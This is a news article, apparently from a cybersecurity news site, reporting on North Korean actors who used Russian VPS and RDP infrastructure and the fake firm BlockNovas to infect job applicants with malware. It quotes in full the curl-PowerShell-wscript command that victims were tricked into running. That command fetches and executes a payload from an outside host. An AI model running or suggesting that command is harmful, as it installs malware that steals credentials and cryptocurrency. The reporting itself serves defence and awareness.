_Olekcii_Mach_Alamy.jpg?width=1280&auto=webp&quality=80&disable=upscale#)
![Most iPhones Sold in the U.S. Will Be Made in India by 2026 [Report]](https://www.iclarified.com/images/news/97130/97130/97130-640.jpg)
![Apple to Shift Robotics Unit From AI Division to Hardware Engineering [Report]](https://www.iclarified.com/images/news/97128/97128/97128-640.jpg)
![Apple Shares New Ad for iPhone 16: 'Trust Issues' [Video]](https://www.iclarified.com/images/news/97125/97125/97125-640.jpg)
![[The AI Show Episode 144]: ChatGPT’s New Memory, Shopify CEO’s Leaked “AI First” Memo, Google Cloud Next Releases, o3 and o4-mini Coming Soon & Llama 4’s Rocky Launch](https://www.marketingaiinstitute.com/hubfs/ep%20144%20cover.png)
.jpg?width=1920&height=1920&fit=bounds&quality=70&format=jpg&auto=webp#)
Russian VPS Servers With RDP, Proxy Servers Fuel North Korean Cybercrime Operations
North Korea’s cybercrime operations have significantly expanded beyond the limited 1,024 IP addresses assigned to their national network through an elaborate scheme involving Russian infrastructure. According to recent findings, five Russian IP ranges, primarily located in the border towns of Khasan and Khabarovsk, are being leveraged to facilitate sophisticated attacks targeting cryptocurrency wallets and sensitive […] The post Russian VPS Servers With RDP, Proxy Servers Fuel North Korean Cybercrime Operations appeared first on Cyber Security News.
North Korea’s cybercrime operations have significantly expanded beyond the limited 1,024 IP addresses assigned to their national network through an elaborate scheme involving Russian infrastructure.
According to recent findings, five Russian IP ranges, primarily located in the border towns of Khasan and Khabarovsk, are being leveraged to facilitate sophisticated attacks targeting cryptocurrency wallets and sensitive information from technology professionals worldwide.
Khasan, situated merely one mile from the North Korea-Russia border and connected via the Korea-Russia Friendship Bridge, serves as a strategic location for these operations.
The cybercriminals have established a multi-layered anonymization network utilizing commercial VPN services, proxy servers, and numerous Virtual Private Servers (VPS) with Remote Desktop Protocol (RDP) access.
This infrastructure enables North Korean threat actors to conceal their origins while connecting to job recruitment platforms, cryptocurrency services, and communication applications including Skype, Telegram, Discord, and Slack.
Trend Micro researchers identified that a threat actor known as Void Dokkaebi (also called Famous Chollima) has been conducting extensive social engineering campaigns through fictitious companies like BlockNovas, which presented itself as a blockchain technology firm with a sophisticated online presence.
BlockNovas targeted IT professionals in Ukraine, the United States, and Germany with fraudulent job interviews, prompting victims to download and execute malware disguised as necessary software for the interview process.
The infrastructure supporting these operations traces back to specific Russian IP ranges assigned to two organizations in Khasan and Khabarovsk.
These IP ranges include 80.237.84.0/24 (created September 2024), 80.237.87.0/24 (created December 2024), 188.43.136.0/24 (created September 2017), and several others registered to network names like KPOST-NET and SKYFREIGHT-NET.
When candidates engaged with BlockNovas’ automated interview process, they received messages claiming their camera needed a software update, with instructions to execute a command:-
curl - k -o "%TEMP%\nvidiaupdate.zip" https://easydriver.cloud/nvidia-rc.update/Ci2e6ZNwwytp0FMWsiu2CpPkVlZCkhou && powershell -Command "Expand-Archive -Force Path '%TEMP%\nvidiaupdate.zip' -DestinationPath '%TEMP%\nvidiadrive'" && wscript "%TEMP%\nvidiadrive\update.vbs"This command downloads and executes malware known as FrostyFerret on Mac systems or GolangGhost on Windows, connecting to command-and-control servers that support both these variants and Beavertail malware.
BlockNovas: A Case Study in North Korean Social Engineering
The BlockNovas operation exemplifies the sophisticated social engineering tactics employed by North Korean threat actors.
.webp)
Created in July 2024, BlockNovas maintained an extensive online presence, including profiles on LinkedIn, Upwork, Facebook, and X (formerly Twitter).
.webp)
The company’s website featured a modern design focused on blockchain technologies, with convincing job postings targeting software professionals.
The group leveraged artificial intelligence to create convincing online personas, including a fictitious Chief Technology Officer whose profile appeared legitimate with hundreds of followers.
BlockNovas specifically targeted Ukrainian IT professionals in December 2024, focusing on individuals with cryptocurrency expertise.
On April 23, 2025, the FBI seized the BlockNovas domain as part of a law enforcement action against North Korean cyber actors.
.webp)
Analysis of the group’s infrastructure revealed connections to Beavertail malware command-and-control servers and password-cracking tools like Hashtopolis, demonstrating the operation’s focus on cryptocurrency theft.
Investigators also discovered instructional videos with non-native English text detailing Beavertail C&C server setup and cryptocurrency wallet password cracking, suggesting collaboration with foreign conspirators beyond the core North Korean team.
These videos were created during RDP sessions from Russian IP addresses, providing further evidence of the Russian infrastructure’s central role in these operations.
Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy
The post Russian VPS Servers With RDP, Proxy Servers Fuel North Korean Cybercrime Operations appeared first on Cyber Security News.
